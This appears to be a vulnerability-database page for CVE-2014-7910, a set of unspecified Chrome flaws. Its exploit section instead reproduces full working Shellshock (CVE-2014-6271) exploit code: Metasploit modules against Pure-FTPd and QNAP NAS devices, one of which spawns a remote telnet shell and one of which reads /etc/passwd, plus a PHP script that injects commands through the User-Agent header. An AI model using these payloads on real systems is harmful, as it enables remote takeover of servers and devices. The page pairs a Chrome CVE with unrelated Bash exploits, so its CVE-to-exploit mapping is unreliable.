CVE-2014-7910
high
CVSS v3
—
CVSS v4 NEW
—
VIR risk
8.5
Description
Multiple unspecified vulnerabilities in Google Chrome before 39.0.2171.65 allow attackers to cause a denial of service or possibly have other impact via unknown vectors.
Predictions
Exploit likelihood
20%
Patch ETA
—
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or — if you've already worked around this in production — publish your fix to the community-verified tier.
✚ Propose a mitigation on Community → Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here withsource_tier=community-verified.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
OpenVPN 2.2.29 - 'Shellshock' Remote Command Injection
Source code queued for fetch — refresh in a moment.
IPFire - CGI Web Interface (Authenticated) Bash Environment Variable Code Injection
Source code queued for fetch — refresh in a moment.
Pure-FTPd - External Authentication Bash Environment Variable Code Injection (Metasploit)
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit4 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::Ftp
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
'Name' => 'Pure-FTPd External Authentication Bash Environment Variable Code Injection',
'Description' => %q(
This module exploits the code injection flaw known as shellshock which
leverages specially crafted environment variables in Bash. This exploit
specifically targets Pure-FTPd when configured to use an external
program for authentication.
),
'Author' =>
[
'Stephane Chazelas', # Vulnerability discovery
'Frank Denis', # Discovery of Pure-FTPd attack vector
'Spencer McIntyre' # Metasploit module
],
'References' =>
[
['CVE', '2014-6271'],
['OSVDB', '112004'],
['EDB', '34765'],
['URL', 'https://gist.github.com/jedisct1/88c62ee34e6fa92c31dc']
],
'Payload' =>
{
'DisableNops' => true,
'Space' => 2048
},
'Targets' =>
[
[ 'Linux x86',
{
'Platform' => 'linux',
'Arch' => ARCH_X86,
'CmdStagerFlavor' => :printf
}
],
[ 'Linux x86_64',
{
'Platform' => 'linux',
'Arch' => ARCH_X86_64,
'CmdStagerFlavor' => :printf
}
]
],
'DefaultOptions' =>
{
'PrependFork' => true
},
'DefaultTarget' => 0,
'DisclosureDate' => 'Sep 24 2014'))
register_options(
[
Opt::RPORT(21),
OptString.new('RPATH', [true, 'Target PATH for binaries used by the CmdStager', '/bin'])
], self.class)
deregister_options('FTPUSER', 'FTPPASS')
end
def check
# this check method tries to use the vulnerability to bypass the login
username = rand_text_alphanumeric(rand(20) + 1)
random_id = (rand(100) + 1)
command = "echo auth_ok:1; echo uid:#{random_id}; echo gid:#{random_id}; echo dir:/tmp; echo end"
if send_command(username, command) =~ /^2\d\d ok./i
return CheckCode::Safe if banner !~ /pure-ftpd/i
disconnect
command = "echo auth_ok:0; echo end"
if send_command(username, command) =~ /^5\d\d login authentication failed/i
return CheckCode::Vulnerable
end
end
disconnect
CheckCode::Safe
end
def execute_command(cmd, _opts)
cmd.gsub!('chmod', "#{datastore['RPATH']}/chmod")
username = rand_text_alphanumeric(rand(20) + 1)
send_command(username, cmd)
end
def exploit
# Cannot use generic/shell_reverse_tcp inside an elf
# Checking before proceeds
if generate_payload_exe.blank?
fail_with(Failure::BadConfig, "#{peer} - Failed to store payload inside executable, please select a native payload")
end
execute_cmdstager(linemax: 500)
handler
end
def send_command(username, cmd)
cmd = "() { :;}; #{datastore['RPATH']}/sh -c \"#{cmd}\""
connect
send_user(username)
password_result = send_pass(cmd)
disconnect
password_result
end
endKemp Load Master 7.1.16 - Multiple Vulnerabilities
Source code queued for fetch — refresh in a moment.
PHP < 5.6.2 - 'Shellshock' Safe Mode / disable_functions Bypass / Command Injection
Source code queued for fetch — refresh in a moment.
GNU Bash - Environment Variable Command Injection (Metasploit)
Source code queued for fetch — refresh in a moment.
Bash CGI - 'Shellshock' Remote Command Injection (Metasploit)
Source code queued for fetch — refresh in a moment.
QNAP - Admin Shell via Bash Environment Variable Code Injection (Metasploit)
# Exploit Title: QNAP admin shell via Bash Environment Variable Code Injection
# Date: 7 February 2015
# Exploit Author: Patrick Pellegrino | 0x700x700x650x6c0x6c0x650x670x720x690x6e0x6f@securegroup.it [work] / 0x640x330x760x620x700x70@gmail.com [other]
# Employer homepage: http://www.securegroup.it
# Vendor homepage: http://www.qnap.com
# Version: All Turbo NAS models except TS-100, TS-101, TS-200
# Tested on: TS-1279U-RP
# CVE : 2014-6271
# Vendor URL bulletin : http://www.qnap.com/i/it/support/con_show.php?cid=61
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/d3vpp/metasploit-modules
##
require 'msf/core'
require 'net/telnet'
class Metasploit3 < Msf::Auxiliary
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::CommandShell
def initialize(info = {})
super(update_info(info,
'Name' => 'QNAP admin shell via Bash Environment Variable Code Injection',
'Description' => %q{
This module allows you to spawn a remote admin shell (utelnetd) on a QNAP device via Bash Environment Variable Code Injection.
Affected products:
All Turbo NAS models except TS-100, TS-101, TS-200
},
'Author' => ['Patrick Pellegrino'], # Metasploit module | 0x700x700x650x6c0x6c0x650x670x720x690x6e0x6f@securegroup.it [work] / 0x640x330x760x620x700x70@gmail.com [other]
'License' => MSF_LICENSE,
'References' => [
['CVE', '2014-6271'], #aka ShellShock
['URL', 'http://www.qnap.com/i/it/support/con_show.php?cid=61']
],
'Platform' => ['unix']
))
register_options([
OptString.new('TARGETURI', [true, 'Path to CGI script','/cgi-bin/index.cgi']),
OptPort.new('LTELNET', [true, 'Set the remote port where the utelnetd service will be listening','9993'])
], self.class)
end
def check
begin
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path),
'agent' => "() { :;}; echo; /usr/bin/id"
})
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Timeout::Error, ::Errno::EPIPE
vprint_error("Connection failed")
return Exploit::CheckCode::Unknown
end
if !res
return Exploit::CheckCode::Unknown
elsif res.code== 302 and res.body.include? 'uid'
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end
def exploit_telnet()
telnetport = datastore['LTELNET']
print_status("#{rhost}:#{rport} - Telnet port used: #{telnetport}")
print_status("#{rhost}:#{rport} - Sending exploit")
begin
sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnetport.to_i })
if sock
print_good("#{rhost}:#{rport} - Backdoor service spawned")
add_socket(sock)
else
fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Backdoor service not spawned")
end
print_status "Starting a Telnet session #{rhost}:#{telnetport}"
merge_me = {
'USERPASS_FILE' => nil,
'USER_FILE' => nil,
'PASS_FILE' => nil,
'USERNAME' => nil,
'PASSWORD' => nil
}
start_session(self, "TELNET (#{rhost}:#{telnetport})", merge_me, false, sock)
rescue
fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Backdoor service not handled")
end
return
end
def run
begin
telnetport = datastore['LTELNET']
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path),
'agent' => "() { :;}; /bin/utelnetd -l/bin/sh -p#{telnetport} &"
})
rescue Rex::ConnectionRefused, Rex::ConnectionTimeout,
Rex::HostUnreachable => e
fail_with(Failure::Unreachable, e)
ensure
disconnect
end
exploit_telnet()
end
endQNAP - Web Server Remote Code Execution via Bash Environment Variable Code Injection (Metasploit)
# Exploit Title: QNAP Web server remote code execution via Bash Environment Variable Code Injection
# Date: 7 February 2015
# Exploit Author: Patrick Pellegrino | 0x700x700x650x6c0x6c0x650x670x720x690x6e0x6f@securegroup.it [work] / 0x640x330x760x620x700x70@gmail.com [other]
# Employer homepage: http://www.securegroup.it
# Vendor homepage: http://www.qnap.com
# Version: All Turbo NAS models except TS-100, TS-101, TS-200
# Tested on: TS-1279U-RP
# CVE : 2014-6271
# Vendor URL bulletin : http://www.qnap.com/i/it/support/con_show.php?cid=61
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/d3vpp/metasploit-modules
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'QNAP Web server remote code execution via Bash Environment Variable Code Injection',
'Description' => %q{
This module allows you to inject unix command with the same user who runs the http service - admin - directly on the QNAP system.
Affected products:
All Turbo NAS models except TS-100, TS-101, TS-200
},
'Author' => ['Patrick Pellegrino'], # Metasploit module | 0x700x700x650x6c0x6c0x650x670x720x690x6e0x6f@securegroup.it [work] / 0x640x330x760x620x700x70@gmail.com [other]
'License' => MSF_LICENSE,
'References' => [
['CVE', '2014-6271'], #aka ShellShock
['URL', 'http://www.qnap.com/i/it/support/con_show.php?cid=61']
],
'Platform' => ['unix']
))
register_options([
OptString.new('TARGETURI', [true, 'Path to CGI script','/cgi-bin/index.cgi']),
OptString.new('CMD', [ true, 'The command to run', '/bin/cat /etc/passwd'])
], self.class)
end
def check
begin
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path),
'agent' => "() { :;}; echo; /usr/bin/id"
})
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Timeout::Error, ::Errno::EPIPE
vprint_error("Connection failed")
return Exploit::CheckCode::Unknown
end
if !res
return Exploit::CheckCode::Unknown
elsif res.code== 302 and res.body.include? 'uid'
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end
def run
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path),
'agent' => "() { :;}; echo; #{datastore['CMD']}"
})
if res.body.empty?
print_error("No data found.")
elsif res.code== 302
print_status("#{rhost}:#{rport} - bash env variable injected")
puts " "
print_line(res.body)
end
end
endBash - 'Shellshock' Environment Variables Command Injection
<?php
/*
Title: Bash Specially-crafted Environment Variables Code Injection Vulnerability
CVE: 2014-6271
Vendor Homepage: https://www.gnu.org/software/bash/
Author: Prakhar Prasad && Subho Halder
Author Homepage: https://prakharprasad.com && https://appknox.com
Date: September 25th 2014
Tested on: Mac OS X 10.9.4/10.9.5 with Apache/2.2.26
GNU bash, version 3.2.51(1)-release (x86_64-apple-darwin13)
Usage: php bash.php -u http://<hostname>/cgi-bin/<cgi> -c cmd
Eg. php bash.php -u http://localhost/cgi-bin/hello -c "wget http://appknox.com -O /tmp/shit"
Reference: https://www.reddit.com/r/netsec/comments/2hbxtc/cve20146271_remote_code_execution_through_bash/
Test CGI Code : #!/bin/bash
echo "Content-type: text/html"
echo ""
echo "Bash-is-Vulnerable"
*/
error_reporting(0);
if(!defined('STDIN')) die("Please run it through command-line!\n");
$x = getopt("u:c:");
if(!isset($x['u']) || !isset($x['c']))
{
die("Usage: ".$_SERVER['PHP_SELF']." -u URL -c cmd\n");
}
$url = $x['u'];
$cmd = $x['c'];
$context = stream_context_create(
array(
'http' => array(
'method' => 'GET',
'header' => 'User-Agent: () { :;}; /bin/bash -c "'.$cmd.'"'
)
)
);
$req = file_get_contents($url, false, $context);
if(!$req && strpos($http_response_header[0],"500") > 0 )
die("Command sent to the server!\n");
else if($req && !strpos($http_response_header[0],"500") > 0)
die("Server didn't respond as it should!\n");
else if(!$req && $http_response_header == NULL)
die("A connection error occurred!\n")
?>CUPS Filter - Bash Environment Variable Code Injection (Metasploit)
Source code queued for fetch — refresh in a moment.
GNU Bash - 'Shellshock' Environment Variable Command Injection
Source code queued for fetch — refresh in a moment.
GNU bash 4.3.11 - Environment Variable dhclient
Source code queued for fetch — refresh in a moment.
Postfix SMTP 4.2.x < 4.2.48 - 'Shellshock' Remote Command Injection
Source code queued for fetch — refresh in a moment.
Application impact
| Vendor | Product | Versions | Fixed |
|---|---|---|---|
| chrome | {"endIncluding":"39.0.2171.45"} | |
References
- http://googlechromereleases.blogspot.com/2014/11/stable-channel-update_18.html
- http://rhn.redhat.com/errata/RHSA-2014-1894.html
- http://secunia.com/advisories/60194
- http://secunia.com/advisories/62608
- http://www.securityfocus.com/bid/71161
- http://www.securitytracker.com/id/1031241
- https://code.google.com/p/chromium/issues/detail?id=337071
- https://code.google.com/p/chromium/issues/detail?id=340387
- https://code.google.com/p/chromium/issues/detail?id=389451
- https://code.google.com/p/chromium/issues/detail?id=391001
- https://code.google.com/p/chromium/issues/detail?id=397396
- https://code.google.com/p/chromium/issues/detail?id=408426
- https://code.google.com/p/chromium/issues/detail?id=409454
- https://code.google.com/p/chromium/issues/detail?id=409508
- https://code.google.com/p/chromium/issues/detail?id=411159
- https://code.google.com/p/chromium/issues/detail?id=411162
- https://code.google.com/p/chromium/issues/detail?id=411165
- https://code.google.com/p/chromium/issues/detail?id=413743
- https://code.google.com/p/chromium/issues/detail?id=413744
- https://code.google.com/p/chromium/issues/detail?id=414134
- https://code.google.com/p/chromium/issues/detail?id=415407
- https://code.google.com/p/chromium/issues/detail?id=417210
- https://code.google.com/p/chromium/issues/detail?id=417329
- https://code.google.com/p/chromium/issues/detail?id=421090
- https://code.google.com/p/chromium/issues/detail?id=421321
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.